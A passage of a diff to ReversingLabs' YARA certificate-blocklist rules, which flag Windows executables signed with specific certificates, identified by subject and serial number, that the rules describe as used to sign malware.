(pe.signatures[i].subject contains "NOSOV SP Z O O" and pe.signatures[i].serial=="0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9c6d2be7-093c-5ce2-83af-6ab9b46603bc" + id = "aff0fb76-587b-5493-810c-ac32a6ba9576" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11880-L11898" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5902-L5918" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813" score = 75 quality = 90 tags = "INFO, FILE" @@ -16687,22 +36478,22 @@ rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OASIS COURT LIMITED" and (pe.signatures[i].serial=="00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures[i].serial=="e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f") and 1608508800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GIE-MUTUALISTE" and pe.signatures[i].serial=="63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4" + id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11900-L11918" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5920-L5936" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494" score = 75 quality = 90 tags = "INFO, FILE" @@ -16712,22 +36503,22 @@ rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "KULBYT LLC" and (pe.signatures[i].serial=="00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures[i].serial=="e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e") and 1614729600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rumikon LLC" and pe.signatures[i].serial=="0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "63e2edab-11a4-55ba-b042-c88b6d2750a5" + id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11920-L11936" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5938-L5954" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe" score = 75 quality = 90 tags = "INFO, FILE" @@ -16737,22 +36528,22 @@ rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WATER, s.r.o." and pe.signatures[i].serial=="28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TES LOGISTIKA d.o.o." and pe.signatures[i].serial=="02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8" + id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11938-L11954" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5956-L5972" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6" score = 75 quality = 90 tags = "INFO, FILE" @@ -16762,22 +36553,22 @@ rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AA PLUS INVEST d.o.o." and pe.signatures[i].serial=="2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Ringen" and pe.signatures[i].serial=="1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2c4061e8-0b8e-5c33-a746-6557449b17ed" + id = "64007bd7-b273-5579-8224-68337f1bc54d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11956-L11972" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5974-L5990" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4" score = 75 quality = 90 tags = "INFO, FILE" @@ -16787,22 +36578,22 @@ rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SERVICE STREAM LIMITED" and pe.signatures[i].serial=="01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures[i].serial=="6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "538d7405-be17-519e-beb5-fbef3beaedd3" + id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11974-L11990" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5992-L6008" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d" score = 75 quality = 90 tags = "INFO, FILE" @@ -16812,22 +36603,22 @@ rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kodemika" and pe.signatures[i].serial=="43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SNAB-RESURS, OOO" and pe.signatures[i].serial=="0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b" + id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11992-L12010" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6010-L6028" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545" score = 75 quality = 90 tags = "INFO, FILE" @@ -16837,22 +36628,22 @@ rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PHL E STATE ApS" and (pe.signatures[i].serial=="00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures[i].serial=="b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8") and 1620000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Information Civilized System Oy" and (pe.signatures[i].serial=="00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures[i].serial=="97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8") and 1602636910<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9" + id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12012-L12028" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6030-L6046" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca" score = 75 quality = 90 tags = "INFO, FILE" @@ -16862,22 +36653,22 @@ rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures[i].serial=="54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Hairis LLC" and pe.signatures[i].serial=="18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5" + id = "f039f379-e3d5-56bd-83b7-016881538017" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12030-L12046" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6048-L6066" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614" score = 75 quality = 90 tags = "INFO, FILE" @@ -16887,22 +36678,22 @@ rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures[i].serial=="14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Absolut LLC" and (pe.signatures[i].serial=="00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures[i].serial=="b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0") and 1602612570<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4d24a880-6fa5-5c22-875e-29f4985e3750" + id = "e1f56719-e726-5f81-99d4-937e343cbcc9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12048-L12064" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6068-L6084" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39" score = 75 quality = 90 tags = "INFO, FILE" @@ -16912,22 +36703,22 @@ rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTH PROPERTY LTD" and pe.signatures[i].serial=="23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VENTE DE TOUT" and pe.signatures[i].serial=="2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df" + id = "30108ce3-b133-5e1d-924f-7caaf390e836" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12066-L12082" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6086-L6102" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e" score = 75 quality = 90 tags = "INFO, FILE" @@ -16937,22 +36728,22 @@ rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REI LUX UK LIMITED" and pe.signatures[i].serial=="02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RASSVET, OOO" and pe.signatures[i].serial=="4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2f72a686-c30c-572d-a78c-03747ac325b6" + id = "86644ef8-4218-5a04-9655-c7d51729872d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12084-L12100" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6104-L6120" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680" score = 75 quality = 90 tags = "INFO, FILE" @@ -16962,22 +36753,22 @@ rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Largos" and pe.signatures[i].serial=="35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MAITLAND TRIFECTA, INC." and pe.signatures[i].serial=="64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6bb83f26-90f5-587f-8c69-fa06beaead3e" + id = "9c16c370-a382-54f7-ba2e-3b738740966f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12102-L12120" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6122-L6138" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf" score = 75 quality = 90 tags = "INFO, FILE" @@ -16987,22 +36778,22 @@ rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HANGA GIP d.o.o." and (pe.signatures[i].serial=="00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures[i].serial=="aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01") and 1615766400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Fubon Technologies Ltd" and pe.signatures[i].serial=="07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c47bb4f0-d60b-5948-ac10-6083606ed46a" + id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L12122-L12138" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L6140-L6158" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee" score = 75 quality = 90 tags = "INFO, FILE" @@ -17012,22 +36803,22 @@ rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Booz Allen Hamilton Inc." and 